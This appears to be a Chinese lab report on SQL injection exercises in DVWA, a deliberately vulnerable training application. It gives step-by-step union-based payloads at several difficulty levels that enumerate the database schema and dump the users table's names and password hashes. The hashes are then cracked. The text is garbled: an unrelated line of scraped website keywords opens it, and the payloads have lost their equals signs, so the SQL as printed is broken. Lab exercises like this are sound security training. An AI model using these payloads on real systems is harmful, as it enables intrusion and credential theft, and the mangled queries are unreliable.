兴义住房和城乡建设局网站,163网站是jsp做的吗,织梦网站程序模板下载,网址域名ip解析【实验内容及要求】
一、内容#xff1a;掌握SQL注入攻击的原理#xff0c;掌握基本SQL注入攻击的方法#xff0c;掌握防SQL注入攻击的基本措施。
二、要求#xff1a;
1. DVWA环境配置
DVWA#xff08;Damn Vulnerable Web Application#xff09;是一个用来进行安全…【实验内容及要求】
一、内容掌握SQL注入攻击的原理掌握基本SQL注入攻击的方法掌握防SQL注入攻击的基本措施。
二、要求
1. DVWA环境配置
DVWADamn Vulnerable Web Application是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用旨在为安全专业人员测试自己的专业技能和工具提供合法的环境帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块分别是Brute Force暴力破解Command Injection命令行注入CSRF跨站请求伪造File Inclusion文件包含File Upload文件上传Insecure CAPTCHA 不安全的验证码SQL InjectionSQL注入SQL InjectionBlindSQL盲注XSSReflected反射型跨站脚本XSSStored存储型跨站脚本。在DVWA 1.9的代码分为四种安全级别LowMediumHighImpossible可以接触一些PHP代码审计的内容。
本实验要求在下载安装并配置好DVWA实验环境在DVWA中创建数据库并进行登录。
2. SQL注入
在DVWA中选择SQL injection其难度等级分为low、medium、high和impossible。随后根据自身情况进行四种等级的SQL注入实验。
3. 亦可使用sqlmap来进行SQL注入攻击实验。 【实验平台】 【实验步骤】
一、实验环境的搭建
1.将DVWA安装包解压到如图所示相应位置并备份修改config.inc.php.dist文件配置然后将安装包解压。 2.更改文件夹权限并重启apache服务。 3.登录搭建好的网站更改配置然后点击Create/Reset Database登录。 二、Low级别的SQL注入
判断注入点。
找闭合输入1’报错”You have an error in your SQL syntax”输入1’’不报错说明闭合是单引号。
输入1’ or ’1234’’1234获得所有First name和Surname。 输入1’ or 11 order by 1 #判断有几个字段 输入1’ or 11 order by 2 # 输入1’ or 11 order by 3 #说明SQL语句查询查询的表的字段数为2。 输入1’ union select 1,2 #判断回显。 爆库输入1’ union select 1,database() #判断使用的数据库。 爆表输入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase() #获得该数据库的表名。 爆列输入1’ union select 1,group_concat(column_name) from information_schema.columns where table_name’users’ #获得user表的列名。 输入1’ or 11 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #获得用户名和密码。 密码均为MD5加密使用CMD5可进行破解。
三、Medium级别SQL注入
由于界面不允许自行输入使用BurpSuite进行抓包。
更改为id4 or 11 #SubmitSubmit可获得所有用户。 更改为id4 order by 2 #SubmitSubmit确定列数。 更改为id4 union select 1,2 #SubmitSubmit判断回显。 更改为id4 union select 1,database() #SubmitSubmit爆库。 更改为id4 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase() #SubmitSubmit爆表。 更改为id4 union select 1,group_concat(column_name) from information_schema.columns where table_name0x7573657273 #SubmitSubmit爆列。其中0x7573657273为users的十六进制ascii码 更改为id4 or 11 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #SubmitSubmit获得用户名和密码。 四、High级别SQL注入
判断注入点。
找闭合输入1’报错”You have an error in your SQL syntax”输入1’’不报错说明闭合是单引号。
输入1’ or 11#获得所有First name和Surname。 输入1’ or 11 order by 2 #判断有几个字段 输入1’ or 11 order by 3 #说明SQL语句查询查询的表的字段数为2。 输入1’ union select 1,2 #判断回显。 爆库输入1’ union select 1,database() #判断使用的数据库。 爆表输入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase() #获得该数据库的表名。 爆列输入1’ union select 1,group_concat(column_name) from information_schema.columns where table_name’users’ #获得user表的列名。 输入1’ or 11 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #获得用户名和密码。 五、Impossible级别
无法注入因为Impossible级别的源码使用正则表达式过滤掉了不合法的字符。